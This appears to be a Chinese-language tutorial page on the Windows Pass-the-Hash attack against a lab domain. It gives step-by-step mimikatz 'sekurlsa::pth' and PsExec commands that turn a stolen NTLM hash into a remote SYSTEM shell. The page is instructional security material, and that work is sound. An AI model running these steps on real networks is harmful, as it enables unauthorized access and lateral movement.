💎一站式轻松地调用各大LLM模型接口,支持GPT4、智谱、豆包、星火、月之暗面及文生图、文生视频 广告
[TOC] ## Pass The Hash (PTH),哈希传递攻击 * 通过找到与账户相关的密码散列值(通常是 NTLM Hash)来进行攻击。 * 在windows网络中,散列值时用来证明身份的(有正确的用户名和密码散列值,就能通过验证) * 由于大量计算机在本地安装时,可能会使用相同的本地管理员账号和密码,这样攻击者就可以使用哈希传递来登录内网中其他的计算机 ## 信息收集 ~~~ • 域名:dongta.test • 用户:administrator • NTLM Hash:ee5d4b6c81a5b0ef40f2e5a662d1379a ~~~ ## 利用 ~~~ 管理员执行cmd,并切换到mimikatz工具目录下 cd 路径 进入到mimiketatz mimikatz.exe 提升到最高权限 privilege::debug 执行脚本 sekurlsa::pth /user:administrator /domain:dongta.test /ntlm:哈希值 PsExec建立shell脚本 Psexec.exe \\192.168.11.11 -s cmd.exe ~~~